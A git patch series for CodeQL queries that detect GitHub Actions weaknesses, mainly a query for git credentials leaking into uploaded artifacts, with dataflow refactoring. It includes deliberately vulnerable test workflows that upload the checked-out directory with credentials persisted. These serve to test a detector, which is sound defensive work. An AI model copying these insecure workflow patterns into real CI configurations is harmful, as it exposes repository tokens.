UsesStep checkout, UsesStep upload +where + checkout.getCallee() = "actions/checkout" and + upload.getCallee() = "actions/upload-artifact" and + checkout.getAFollowingStep() = upload and + ( + not exists(checkout.getArgument("persist-credentials")) or + checkout.getArgument("persist-credentials") = "true" + ) and + upload.getVersion() = + [ + "v4.3.6", "834a144ee995460fba8ed112a2fc961b36a5ec5a", // + "v4.3.5", "89ef406dd8d7e03cfd12d9e0a4a378f454709029", // + "v4.3.4", "0b2256b8c012f0828dc542b3febcab082c67f72b", // + "v4.3.3", "65462800fd760344b1a7b4382951275a0abb4808", // + "v4.3.2", "1746f4ab65b179e0ea60a494b83293b640dd5bba", // + "v4.3.1", "5d5d22a31266ced268874388b861e4b58bb5c2f3", // + "v4.3.0", "26f96dfa697d77e81fd5907df203aa23a56210a8", // + "v4.2.0", "694cdabd8bdb0f10b2cea11669e1bf5453eed0a6", // + "v4.1.0", "1eb3cb2b3e0f29609092a73eb033bb759a334595", // + "v4.0.0", "c7d193f32edcb7bfad88892161225aeda64e9392", // + ] +select upload, "A secret is exposed in a public artifact uploaded by $@", upload, + "actions/upload-artifact" diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml new file mode 100644 index 00000000000..611ac16dcfa --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml @@ -0,0 +1,23 @@ +name: secrets-in-artifacts +on: + pull_request: +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: results + test2: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: "Upload artifact" + uses: actions/upload-artifact@v4 + with: + name: file + path: results + diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected new file mode 100644 index 00000000000..67c7fd6e8aa --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected @@ -0,0 +1 @@ +| .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | actions/upload-artifact | diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref new file mode 100644 index 00000000000..c9bb538a12d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref @@ -0,0 +1,2 @@ +Security/CWE-312/SecretsInArtifacts.ql + From 6eef51e4154410af85604069a74a202d576052fb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 17:22:44 +0200 Subject: [PATCH 0487/1267] fix: add path checks --- ql/src/Security/CWE-312/SecretsInArtifacts.ql | 8 ++- .../workflows/secrets-in-artifacts.yml | 51 +++++++++++++++++-- .../CWE-312/SecretsInArtifacts.expected | 3 ++ 3 files changed, 56 insertions(+), 6 deletions(-) diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql index 07e498706d8..e2d8ba93452 100644 --- a/ql/src/Security/CWE-312/SecretsInArtifacts.ql +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql @@ -35,6 +35,12 @@ where "v4.2.0", "694cdabd8bdb0f10b2cea11669e1bf5453eed0a6", // "v4.1.0", "1eb3cb2b3e0f29609092a73eb033bb759a334595", // "v4.0.0", "c7d193f32edcb7bfad88892161225aeda64e9392", // - ] + ] and + ( + not exists(checkout.getArgument("path")) and + upload.getArgument("path") = [".", "*"] + or + checkout.getArgument("path") + ["", "/*"] = upload.getArgument("path") + ) select upload, "A secret is exposed in a public artifact uploaded by $@", upload, "actions/upload-artifact" diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml index 611ac16dcfa..f77a2ab30d3 100644 --- a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml +++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml @@ -2,7 +2,7 @@ name: secrets-in-artifacts on: pull_request: jobs: - test1: + test1: # VULNERABLE runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -10,8 +10,8 @@ jobs: uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 with: name: file - path: results - test2: + path: . + test2: # NOT VULNERABLE runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -19,5 +19,46 @@ jobs: uses: actions/upload-artifact@v4 with: name: file - path: results - + path: . + test3: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: "*" + test4: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + path: foo + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: foo + test5: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + path: foo + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: foo/* + test6: # NOT VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + path: pr + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: foo diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected index 67c7fd6e8aa..1c7fd8ab2ce 100644 --- a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected +++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected @@ -1 +1,4 @@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | actions/upload-artifact | From 37fc6156d09c506e1453c466c84ee6697f0efa88 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 17:30:49 +0200 Subject: [PATCH 0488/1267] Removing experimental flag --- ql/src/Security/CWE-312/SecretsInArtifacts.ql | 1 - 1 file changed, 1 deletion(-) diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql index e2d8ba93452..a7ed799f761 100644 --- a/ql/src/Security/CWE-312/SecretsInArtifacts.ql +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql @@ -8,7 +8,6 @@ * @id actions/secrets-in-artifacts * @tags actions * security - * experimental * external/cwe/cwe-312 */ From 25eb417acc989030ceb3acedd368ad584a671eec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 17:32:35 +0200 Subject: [PATCH 0489/1267] Remove public wording --- ql/src/Security/CWE-312/SecretsInArtifacts.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql index a7ed799f761..494a955f96b 100644 --- a/ql/src/Security/CWE-312/SecretsInArtifacts.ql +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql @@ -41,5 +41,5 @@ where or checkout.getArgument("path") + ["", "/*"] = upload.getArgument("path") ) -select upload, "A secret is exposed in a public artifact uploaded by $@", upload, +select upload, "A secret is exposed in an artifact uploaded by $@", upload, "actions/upload-artifact" From 5e92026f145157c114040568ef4822fc465fff68 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 17:34:55 +0200 Subject: [PATCH 0490/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3fb25b389f8..046015a5da8 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.38 +version: 0.1.39 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c806f76f42b..827836a2dce 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.38 +version: 0.1.39 groups: [actions, queries] suites: codeql-suites extractor: javascript From 72e0851e910db7a85a545d6b0d058451812a17d4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 22:53:16 +0200 Subject: [PATCH 0491/1267] Update metadata for Secrets in Artifact query --- ql/src/Security/CWE-312/SecretsInArtifacts.ql | 7 ++++--- .../Security/CWE-312/SecretsInArtifacts.expected | 8 ++++---- 2 files changed, 8 insertions(+), 7 deletions(-) diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/ql/src/Security/CWE-312/SecretsInArtifacts.ql index 494a955f96b..836f1c7dec2 100644 --- a/ql/src/Security/CWE-312/SecretsInArtifacts.ql +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.ql @@ -1,9 +1,10 @@ /** - * @name Secret In Artifacts - * @description Secrets are exposed in GitHub Artifacts + * @name Storage of sensitive information in GitHub Actions artifact + * @description Including sensitive information in a GitHub Actions artifact can + * expose it to an attacker. * @kind problem * @problem.severity error - * @security-severity 9.0 + * @security-severity 7.5 * @precision high * @id actions/secrets-in-artifacts * @tags actions diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected index 1c7fd8ab2ce..86ac293521c 100644 --- a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected +++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected @@ -1,4 +1,4 @@ -| .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | actions/upload-artifact | -| .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | actions/upload-artifact | -| .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | actions/upload-artifact | -| .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | A secret is exposed in a public artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:9:9:14:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | actions/upload-artifact | From 84b02febfe014642dadd572da3942713dea2a8ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 22:53:53 +0200 Subject: [PATCH 0492/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 046015a5da8..1a3918d5d98 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.39 +version: 0.1.40 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 827836a2dce..64d40f75480 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.39 +version: 0.1.40 groups: [actions, queries] suites: codeql-suites extractor: javascript From 279b0bb8f175e9b968972ed170fe9f964e8d311d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 23:33:46 +0200 Subject: [PATCH 0493/1267] Change description for CWE-1395 query --- ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md | 2 +- ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md index 61fab1d8ed4..91360a30ed8 100644 --- a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md @@ -2,7 +2,7 @@ ## Description -The security of the workflow and the repository could be compromised by GitHub Actions workflows that utilize third-party GitHub Actions with known vulnerabilities. +The security of the workflow and the repository could be compromised by GitHub Actions workflows that utilize GitHub Actions with known vulnerabilities. ## Recommendations diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql index c0a81b66a48..497a3b9feb9 100644 --- a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql @@ -1,6 +1,6 @@ /** - * @name Use of known vulnerable 3rd party action. - * @description The workflow is using a known vulnerable 3rd party action. + * @name Use of a known vulnerable action. + * @description The workflow is using an action with known vulnerabilities. * @kind problem * @problem.severity error * @security-severity 7.5 From 2720aaf0972e62691ff50af8bc9545a1f55e918e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 23:36:29 +0200 Subject: [PATCH 0494/1267] Add new test for secrets in artifact query --- .../workflows/secrets-in-artifacts.yml | 23 +++++++++++++++++++ .../CWE-312/SecretsInArtifacts.expected | 1 + 2 files changed, 24 insertions(+) diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml index f77a2ab30d3..473d5998695 100644 --- a/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml +++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml @@ -62,3 +62,26 @@ jobs: with: name: file path: foo + test7: # NOT VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + persist-credentials: false + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: . + test8: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + persist-credentials: true + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: . + diff --git a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected index 86ac293521c..0acb306b9d6 100644 --- a/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected +++ b/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected @@ -2,3 +2,4 @@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:27:9:32:2 | Uses Step | actions/upload-artifact | | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:38:9:43:2 | Uses Step | actions/upload-artifact | | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:49:9:54:2 | Uses Step | actions/upload-artifact | +| .github/workflows/secrets-in-artifacts.yml:82:9:86:18 | Uses Step | A secret is exposed in an artifact uploaded by $@ | .github/workflows/secrets-in-artifacts.yml:82:9:86:18 | Uses Step | actions/upload-artifact | From f9d66d9b5e1c95885a49b45b4a3b384e8f78a847 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 6 Sep 2024 23:37:00 +0200 Subject: [PATCH 0495/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1a3918d5d98..0392a200bb4 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.40 +version: 0.1.41 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 64d40f75480..5b81393abdb 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.40 +version: 0.1.41 groups: [actions, queries] suites: codeql-suites extractor: javascript From 42b487b348329db069d1fc0b4f1bc542fe5b17ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 09:49:43 +0200 Subject: [PATCH 0496/1267] Match callers and callees when root is not the repo root When running codeql test run, the root of the database is not the root of the original repo (the directory containing .github and .git) therefore calls to reusable workflows are not correctly matched. --- .../dataflow/internal/DataFlowPrivate.qll | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 47cd38d47fa..2d391841410 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -86,7 +86,7 @@ class DataFlowCall instanceof Cfg::Node { int totalorder() { none() } /** Gets the location of this call. */ - Location getLocation() { result = this.getLocation() } + Location getLocation() { result = this.(Cfg::Node).getLocation() } } /** @@ -97,7 +97,17 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflow - then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() + then + result = + this.(ReusableWorkflow) + .getLocation() + .getFile() + .getRelativePath() + .suffix(this.(ReusableWorkflow) + .getLocation() + .getFile() + .getRelativePath() + .indexOf("/.github/workflows") + 1) else if this instanceof CompositeAction then @@ -118,7 +128,7 @@ class DataFlowCallable instanceof Cfg::CfgScope { int totalorder() { none() } /** Gets the location of this callable. */ - Location getLocation() { result = this.getLocation() } + Location getLocation() { result = this.(Cfg::CfgScope).getLocation() } } newtype TReturnKind = TNormalReturn() @@ -380,8 +390,8 @@ predicate storeStep(Node node1, ContentSet c, Node node2) { fieldStoreStep(node1, node2, c) or madStoreStep(node1, node2, c) or envToOutputStoreStep(node1, node2, c) or - artifactToOutputStoreStep(node1, node2, c) or envToEnvStoreStep(node1, node2, c) or + artifactToOutputStoreStep(node1, node2, c) or artifactToEnvStoreStep(node1, node2, c) } From bd0c762781df6f3c1d69ad2d114600d18904b55c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 09:51:32 +0200 Subject: [PATCH 0497/1267] Refactor: Do not use PRHeadCheckoutStep on any dependency of TaintTracking Problem is that there are StoreSteps that depend on PRHeadCheckout so there is a non-monotic recursion error since PRHeadCheckout depends on TaintTracking module, but this module depends on PRHeadCheckout --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 35 ++++++++++--------- .../security/OutputClobberingQuery.qll | 11 +++++- 2 files changed, 29 insertions(+), 17 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index aa31954ad3c..9ca17eb4dab 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -155,6 +155,20 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: ) } +predicate controlledCWD(Step artifact) { + artifact instanceof UntrustedArtifactDownloadStep or + // This shoould be: + // artifact instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + artifact.(Uses).getCallee() = "actions/checkout" or + artifact instanceof GitMutableRefCheckout or + artifact instanceof GitSHACheckout or + artifact instanceof GhMutableRefCheckout or + artifact instanceof GhSHACheckout +} + /** * A downloaded artifact that gets assigned to a Run step output. * - uses: actions/download-artifact@v2 @@ -165,10 +179,7 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: */ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, Step artifact, string content, string key, string value | - ( - artifact instanceof UntrustedArtifactDownloadStep or - artifact instanceof PRHeadCheckoutStep - ) and + controlledCWD(artifact) and ( // A file is read and its content is assigned to an env var // - run: | @@ -207,10 +218,7 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da */ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, string content, string key, string value, Step artifact | - ( - artifact instanceof UntrustedArtifactDownloadStep or - artifact instanceof PRHeadCheckoutStep - ) and + controlledCWD(artifact) and ( // A file is read and its content is assigned to an env var // - run: | @@ -246,25 +254,20 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF */ predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Step artifact, Run run | - ( - artifact instanceof UntrustedArtifactDownloadStep or - artifact instanceof PRHeadCheckoutStep - ) and + controlledCWD(artifact) and pred.asExpr() = artifact and succ.asExpr() = run.getScriptScalar() and artifact.getAFollowingStep() = run ) } +// /** * A download artifact step followed by a envvar-injection uses step . */ predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Step artifact, Uses uses | - ( - artifact instanceof UntrustedArtifactDownloadStep or - artifact instanceof PRHeadCheckoutStep - ) and + controlledCWD(artifact) and madSink(succ, "envvar-injection") and pred.asExpr() = artifact and succ.asExpr() = uses and diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 5a85c22bb8f..38a8d2b9d0b 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -22,7 +22,16 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { exists(Run run, Step step | ( step instanceof UntrustedArtifactDownloadStep or - step instanceof PRHeadCheckoutStep + // This shoould be: + // artifact instanceof PRHeadCheckoutStep + // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error + // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround + // instead of using ActionsMutableRefCheckout and ActionsSHACheckout + step.(Uses).getCallee() = "actions/checkout" or + step instanceof GitMutableRefCheckout or + step instanceof GitSHACheckout or + step instanceof GhMutableRefCheckout or + step instanceof GhSHACheckout ) and this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and From 147da50cb993e35cc7831cd5ccf1efd573895255 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 09:52:09 +0200 Subject: [PATCH 0498/1267] Use Taint Tracking to track PR refs to checkout's ref argument --- .../security/UntrustedCheckoutQuery.qll | 150 +++++++++++------- 1 file changed, 95 insertions(+), 55 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 7cfda4da49c..df3e1e4d8a2 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -1,12 +1,90 @@ import actions -import codeql.actions.DataFlow +private import codeql.actions.DataFlow +private import codeql.actions.TaintTracking -string getStepCWD() { - // TODO: This should be the path of the git command. - // Read if from the step's CWD, workspace or look for a cd command. - result = "?" +/** + * A taint-tracking configuration for PR HEAD references flowing + * into actions/checkout's ref argument. + */ +private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + // `ref` argument contains the PR id/number or head ref + exists(Expression e | + source.asExpr() = e and + ( + containsHeadRef(e.getExpression()) or + containsPullRequestNumber(e.getExpression()) + ) + ) + or + // 3rd party actions returning the PR head ref + exists(StepsExpression e, UsesStep step | + source.asExpr() = e and + e.getStepId() = step.getId() and + ( + step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_ref" + or + step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "alessbell/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "gotson/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "potiuk/get-workflow-origin" and + e.getFieldName() = ["sourceHeadBranch", "pullRequestNumber"] + or + step.getCallee() = "github/branch-deploy" and e.getFieldName() = ["ref", "fork_ref"] + ) + ) + } + + predicate isSink(DataFlow::Node sink) { + exists(Uses uses | + uses.getCallee() = "actions/checkout" and + uses.getArgumentExpr("ref") = sink.asExpr() + ) + } } +module ActionsMutableRefCheckoutFlow = TaintTracking::Global; + +private module ActionsSHACheckoutConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + // `ref` argument contains the PR head/merge commit sha + exists(Expression e | + source.asExpr() = e and + containsHeadSHA(e.getExpression()) + ) + or + // 3rd party actions returning the PR head sha + exists(StepsExpression e, UsesStep step | + source.asExpr() = e and + e.getStepId() = step.getId() and + ( + step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_sha" + or + step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_sha" + or + step.getCallee() = "alessbell/pull-request-comment-branch" and e.getFieldName() = "head_sha" + or + step.getCallee() = "gotson/pull-request-comment-branch" and e.getFieldName() = "head_sha" + or + step.getCallee() = "potiuk/get-workflow-origin" and + e.getFieldName() = ["sourceHeadSha", "mergeCommitSha"] + ) + ) + } + + predicate isSink(DataFlow::Node sink) { + exists(Uses uses | + uses.getCallee() = "actions/checkout" and + uses.getArgumentExpr("ref") = sink.asExpr() + ) + } +} + +module ActionsSHACheckoutFlow = TaintTracking::Global; + bindingset[s] predicate containsPullRequestNumber(string s) { exists( @@ -73,6 +151,12 @@ predicate containsHeadRef(string s) { ) } +private string getStepCWD() { + // TODO: This should be the path of the git command. + // Read if from the step's CWD, workspace or look for a cd command. + result = "?" +} + /** Checkout of a Pull Request HEAD */ abstract class PRHeadCheckoutStep extends Step { abstract string getPath(); @@ -89,35 +173,9 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt ActionsMutableRefCheckout() { this.getCallee() = "actions/checkout" and ( - // ref argument contains the PR id/number or head ref/sha - exists(Expression e | - ( - 